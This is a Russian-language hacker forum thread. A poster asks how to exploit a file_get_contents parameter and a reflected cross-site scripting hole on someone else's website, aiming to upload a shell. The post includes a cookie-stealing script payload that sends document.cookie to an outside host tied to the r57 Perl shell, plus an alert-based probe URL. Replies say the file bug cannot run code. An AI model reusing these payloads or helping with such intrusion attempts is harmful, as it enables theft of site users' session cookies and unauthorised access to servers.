Добровго всем времени суток!
Вот есть проблема. Возможно кто-нибудь да и поможет ее решить.
1.

Существует сайт, в корне лежит скрипт вида script.php?ch=something Это something берется из папки /FOLDER/
при запросе script.php?ch=' вылазит такой текст:

Warning: file_get_contents(/usr/local/apache/htdocs/FOLDER/\'.txt): failed to open stream: No such file or directory in /usr/local/apache/htdocs/script.php on line 13

пробовал делать так: script.php/?ch="><script>document.location='http://www.myhost.narod.ru/hack/r57pws.pl?%20'%20+document.cookie%3C/script%3E где r57pws.pl - знаменитый перловый шелл
вылазит сообщение:

Warning: file_get_contents(/usr/local/apache/htdocs/FOLDER/\">document.location=\'http://www.myhost.narod.ru/hack/r57pws.pl? \'%2.txt): failed to open stream: No such file or directory in /usr/local/apache/htdocs/script.php on line 13

потом решил перекодировать в hex и опять сделал запрос. тоже ничегно не получилось.


2. script.php?view=1132&search_text=%22%3E%3Cscript%3Ealert%28%27slert%27% 29%3C%2Fscript%3E%3C%22&search_in_names=1&search_in_com=1&film_year=1&film_cat=1&search_filmtype=1 - там возможен межсайтвоый скриптинг




вопрос к вам. каким образом успешно использовать эти уязвимости можно?

http://ru.php.net/manual/ru/function.file-get-contents.php
за пределы каталога ты не выйдешь, да и файлы отличного расширения не загрузишь =\

ну так а серв же линуховый. ядро 2,6,4 ))

Дык, вот, за пределы данной папки выходить и не надо, просто нужно залить шелл.
Скажите, можно-ли *.txt файл запустить на сервере как *.php? На сколько я понимаю, если сервер линуховый, то он "понимает" тип фйайла
не по расширению, а по содержимому. Подскажите, как развить и реализовать данную идею. Заранее благодарен.

да не запуститца у тебя шелл!!!
file_get_contents -- Получить содержимое файла в виде одной строки

т.е. 2 приведенные баги фактически заюзать в полезных целях нельзя?